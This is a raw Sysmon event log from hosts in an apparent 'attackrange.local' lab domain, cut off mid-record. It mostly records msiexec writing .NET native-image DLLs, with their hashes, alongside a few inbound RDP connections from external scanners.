23542300x800000000000000073163Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.859{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\W50MXUJNJZ\System.Numerics.ni.dllMD5=63A9B260BCFCC94E75F0B012DE2B32EF,SHA256=3BFD410197EBDCE1914F9CA077D5B2BE75A664A54D5D9B05169694327EC86CE3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073162Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.859{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\W1OTATR3BA\UIAutomationClient.ni.dll.auxMD5=49EEFA3688F97076A8DC47723F5C4845,SHA256=D64824E803DF08D47FB0EC670C5695F98C0B58A6537ECE77006412EB6785766A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073161Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.859{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\W1OTATR3BA\UIAutomationClient.ni.dllMD5=1C08FF101FAAAFADEFC6F118ADE6297B,SHA256=126D05D508BAC0D8FBCC8E6863A936B443B5A47E03A34F956F0514918A00D001,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073160Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.844{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\W0SJHH1P9V\System.Numerics.ni.dll.auxMD5=FC4A9B25E8155BEA4F2BAD2E9934B186,SHA256=E75825CDB00102013ED61BA8DC72868336265A7A43AFE27482A839A08E34DE0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073159Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.844{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\W0SJHH1P9V\System.Numerics.ni.dllMD5=0302AAD9C6C6C01BDD78B04909FF39FC,SHA256=EF8E4770CE7024DDF0796A901E32C0D76F1ABD6508ECF24129A56EB18CC7C677,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073158Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.812{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\VX4BCJ2LB7\System.Xml.ni.dll.auxMD5=040DE208CE1EB5D0024CE936E00E3392,SHA256=33953292338BFB6EE2756974051377A824A6C6DA3BA533A3FBA6D86218957BEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073157Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.812{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\VX4BCJ2LB7\System.Xml.ni.dllMD5=6644706835E5D443B9822C53AED1B87C,SHA256=14CFCA3962038FEEFF28F93571BDA791D9DAF2FB8E34C066E027DBEF1D07F5F7,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073156Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.672{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=46E62CBCFC34814BD0607C099FDB632F,SHA256=52365E8C6D748B3D5187020B52F0D6D91EFD0581AD2D5DCADBE0254F129C786F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073155Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.547{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\VOKV399A76\System.Numerics.ni.dll.auxMD5=EB049ABA5517841C734115079F8BD603,SHA256=2877312EFE8951A61700B5A8981F42E506060308E5D402F8E5FC7F879EDAC5FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073154Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.547{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\VOKV399A76\System.Numerics.ni.dllMD5=D282D2158C31BBF5B31EE855F7B15EC7,SHA256=72E1074D33DC23AB1D680257B353F3C2210E1C9095D3284570DC678FA3E93907,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073153Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.547{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\VGSM4TUE6Y\System.Configuration.ni.dll.auxMD5=EA64890856D84601CF0F15F8F925876E,SHA256=BC3CBF89983AF4F608D30A0FA34FB62C3F716BF7B77DAF65A806DD567D4EEA24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073152Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.531{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\VGSM4TUE6Y\System.Configuration.ni.dllMD5=7C4B6B49CBB1C3DBAA853BD4E51B378B,SHA256=91DE196C16599FE3164E02F877E74D5F2526AC8C0B8DFDDD3A07D072654E8E98,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073151Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.531{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=122BA90A551A867436F510DCA408078E,SHA256=F613C9A5D6A44D9CB3F14F77B6F6BE23796974128CC44F9A9797C599FB43CCB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073150Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.515{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\VFP45VJMS1\System.ni.dll.auxMD5=9DB501C48DC60DBFB5B0DEA1779EE47C,SHA256=A0D973D80250931A6FB9EE13DF0B860E736D456AEA631120A0012B15DAA98562,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073149Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.515{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\VFP45VJMS1\System.ni.dllMD5=250BD9B205730F5DAA6260EEF61B4390,SHA256=E2ED60C97B5D4342A06BE98C8930413714AE287B8E678833C0A81DF457D20101,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073148Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.281{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\V6PJ8FVQ98\System.Numerics.ni.dll.auxMD5=46C8A979AD3266DDEF725C7E593B0EC9,SHA256=44F41AE20DFD28ABE6EE0E04898C519AD9709FA50D948409B2ECD81BB20D3D37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073147Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.281{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\V6PJ8FVQ98\System.Numerics.ni.dllMD5=63A9B260BCFCC94E75F0B012DE2B32EF,SHA256=3BFD410197EBDCE1914F9CA077D5B2BE75A664A54D5D9B05169694327EC86CE3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073146Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.265{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\UWD5VJH2F1\System.ni.dll.auxMD5=FD6DE591D3545BD3186DE631F46BB80B,SHA256=D9B496E22C03C6FE99055B4F3BE41057867B2190F6032B0E7B386988E37046C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073145Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.265{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\UWD5VJH2F1\System.ni.dllMD5=94AE45817D7A11DB2165BC6DF4997AD3,SHA256=45879B1C723A5AE6F9577A9BC99A145C15487C5CD4FF456EEDBCC87403041C9A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073144Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.250{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=12B84C378B5ECEE226C77EF4AD5FAE05,SHA256=226127EEC9685946FAF0DF7A06E33E8BE2EA9539EC67709FEFB41A397D6FC107,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073143Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.172{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\UD49G3NY52\System.Core.ni.dll.auxMD5=4D66BF5119D58A48BD3F7A7AD7354010,SHA256=131D289921A8DADB218DF0D0E67B3EF964AD315171A92823D7FF5B7881E1CA98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073142Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.172{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\UD49G3NY52\System.Core.ni.dllMD5=2A6660246DC3C48C26515DC456C27404,SHA256=3A9DE09DE10C5F9F3A1D3B49FEF7A50181275A29E7A6B909E2850D80DD736457,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000050043Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:36.406{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0A9DE94B20FD79F0CD6F221226B123AF,SHA256=7C5DBE6E5CFCF5F9B99DFDD6E7E2287C47187AB486473525E8C92A4CFC9A506B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050042Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:36.375{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5068EF9318E52F0F1A894D0656921209,SHA256=05C6F0F896E739583ADEFC145424728E7C91C08C72B27A4B3522F5889C514FCA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073185Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.017{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-41050-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073184Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.844{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\XEFBNA36PH\System.Configuration.Install.ni.dll.auxMD5=5A370DF59B981781F12A7F3A37D66361,SHA256=110B34A25634C7C5EFD6242F5A78BB129C5DB3A8F7BCD745233898DF3B63153B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073183Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.844{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\XEFBNA36PH\System.Configuration.Install.ni.dllMD5=BB79E90A6CDC752EC6FA8D004D881F82,SHA256=094F1E63ED0E7041F3C57AADFEA670CE53997439B064C4C5802CE19434004860,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073182Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.828{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\XAOAEWYN6S\System.ni.dll.auxMD5=97D37AFB390992CE3C6F1D4E1112CAA5,SHA256=E9BE5584192A17CDF882242AB2C104E2A185B276E589F81AEC50663E4BA6F881,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073181Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.828{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\XAOAEWYN6S\System.ni.dllMD5=709A692740777021A1BC08A50B61C807,SHA256=AD85D06B3912A64986318D87202BDCAD748D6E68E3B693D37459EF9874889CCF,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073180Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.703{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B88190CC5AA834B70BF3771F6186310,SHA256=FFDAFB64228039A92017EE9511EBF54AFABD120638BE95C68D8FDCB3CB0C8195,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073179Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.609{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\X6YBSYVLCJ\System.Web.ni.dll.auxMD5=F75844856EE6FABD9C2BF434525D8F9F,SHA256=1F40EEB68BE036B5E0B884535BE71578A36B57947ED17056394FEF8E5E411B4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073178Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.609{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\X6YBSYVLCJ\System.Web.ni.dllMD5=42107A9680DD1F0C15ECA4BD0B4C3A45,SHA256=E865E3843039ED20DA42936DE4AE5A66B282101FC494E5676F6BAE458429D669,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073177Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.547{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6E06CB4E13EAB2CA752BCAB613E61CE,SHA256=CE14750FC70F039EBA6A911FB485F260CF31BD9CB6CF496E39DAD3431A732994,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073176Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.344{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\X2S77D7DWO\System.Drawing.ni.dll.auxMD5=8BA67D8C1268098CFBBA2A626FF8FC6D,SHA256=4739DF54BA9C20953325031131B36E067190CF704B808F6886195A3426F3E43F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073175Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.344{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\X2S77D7DWO\System.Drawing.ni.dllMD5=25C1B73B943AFAA7C8CC9475EEB22DBD,SHA256=5C5CB8277339CD69DC9C42FD25678D6752321C18797CAA37349203D499EB5610,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073174Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.312{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\WPILUDZPG6\System.Transactions.ni.dll.auxMD5=799D1D6903AEF7B551CD4A4C6B265AA9,SHA256=EAE828D0DC70B8C0CADC0F2FB1EB4DAB7A5E36C371C4B8A27C807DE7C0974339,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073173Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.312{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\WPILUDZPG6\System.Transactions.ni.dllMD5=8D18FAAB7987602078CF848438C95F88,SHA256=AB760B68DE4E3D55C85FBC48423AC7C47C8A8C34FC3964E0473DA960D0BC3C5D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073172Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.297{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\WLMOZX3B9O\System.ni.dll.auxMD5=FD6DE591D3545BD3186DE631F46BB80B,SHA256=D9B496E22C03C6FE99055B4F3BE41057867B2190F6032B0E7B386988E37046C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073171Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.297{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\WLMOZX3B9O\System.ni.dllMD5=94AE45817D7A11DB2165BC6DF4997AD3,SHA256=45879B1C723A5AE6F9577A9BC99A145C15487C5CD4FF456EEDBCC87403041C9A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073170Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.078{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\WKZTAV0AK0\System.Numerics.ni.dll.auxMD5=1964D64FF04708A0CF5838B9DF1E6988,SHA256=30E5029EC1D69530F1631F056368F3DB0F87DFFCA5C3E7C0D8F81706B0BFE044,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073169Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.078{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\WKZTAV0AK0\System.Numerics.ni.dllMD5=8E902B0115147C7B7399AC6133CFD38D,SHA256=D4DF764B7FA01B0EAFF612668AFA401B6BBE251A7F89E3B9D935479EF6259E43,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073168Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.062{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\WIAV2QPVKF\System.DirectoryServices.ni.dll.auxMD5=91B2F2790B225E9B80B1642A87D19DA5,SHA256=F23B64863222A016CF4439EEDC90057CFEC21BC75A0D7D8118CE8996F42E8B98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073167Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.062{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\WIAV2QPVKF\System.DirectoryServices.ni.dllMD5=EB699F153BF3322C608FA8EC593641AC,SHA256=C88E1D58C19711E2951ACAD7EFB6D6F420D52D13C93B77B4E80B36396EB5AF10,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073166Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.015{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\WFQN4O5QK0\System.Xml.ni.dll.auxMD5=0065E7A8A8E46E486B81AF49DEDC3662,SHA256=16EC780118ECB011D545094DA54471D9E80EEEBFD7B6FC6CC36C0950B74782BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073165Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.015{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\WFQN4O5QK0\System.Xml.ni.dllMD5=AE3813D8498A050E3F1C35361CBB502B,SHA256=D6ADECF0D79D00DE226C5558372C5A2AE2F662F9A9F0BAAB1CAE8FCCB77A525A,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000050045Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:35.447{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-61300-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050044Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:37.375{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7068F81A45B8ADC51E26B437E0D48492,SHA256=8120534A073A2BA18CCEB72AE6FD0123A6F9313492D61CC8B5C7360B5AB2A1AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073209Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.984{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\ZWB27RLG8P\System.Management.ni.dll.auxMD5=DB8ADD4CB7AB7C2BECB6E5D2876DCD98,SHA256=C508A4E3185C74167CBFDFFFC0296BAE94CD0406996404244EA570FE5FD4FCDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073208Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.984{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\ZWB27RLG8P\System.Management.ni.dllMD5=4840576F30CADC46214E01EEB1DDEB0F,SHA256=182B6C71998AA6298C694DEE7047C8D4E74228A3B112BE72EA26694380F7E86B,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073207Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.953{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\Z9ZNHXO485\System.Core.ni.dll.auxMD5=FF4E2C92B938268E23AEED9F7BC732F8,SHA256=19FC78637B8A3B2A736A0ADD2E08F35E595E8854D68B668FB03022BD4AAECBBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073206Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.953{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\Z9ZNHXO485\System.Core.ni.dllMD5=95173A32BB22297C898788BECB82637B,SHA256=EA0063A4BEF0AD2C8C8BECBFF53222AF78D9E5C3199903A8CFCEA2E63BB78C24,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000073205Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:37.508{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-42415-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000073204Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.764{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com51738-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073203Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.828{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\YW6H3N5KJN\System.Core.ni.dll.auxMD5=837ED7C37327AAC0A3D72346C92C1E33,SHA256=03CCB7D13D93251175DE2ABAAA91E995C4A2FD627167E2E150B73A0B68C288FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073202Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.812{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\YW6H3N5KJN\System.Core.ni.dllMD5=FE8274D8E31521C1EE127F0B9A468B11,SHA256=5EC1AB20A6FC7C8B10B5915D6BFED9B96EF524DDE933816D521A21239C339D16,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073201Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.594{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\YBIDL94MA4\System.Management.ni.dll.auxMD5=9E113C3F173739443B36B19DD5C6669B,SHA256=E6D1A62EA7C191912AA011D805E8000EE89FE7281E888EF7A398F4FBA9AC4182,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073200Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.594{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\YBIDL94MA4\System.Management.ni.dllMD5=545B093E8C7408982436090E8E13BA3C,SHA256=CFFD545D318D02B523B06E28AFD09A3649D013965B45986CFCAEE54A07AF0C1A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073199Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.594{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 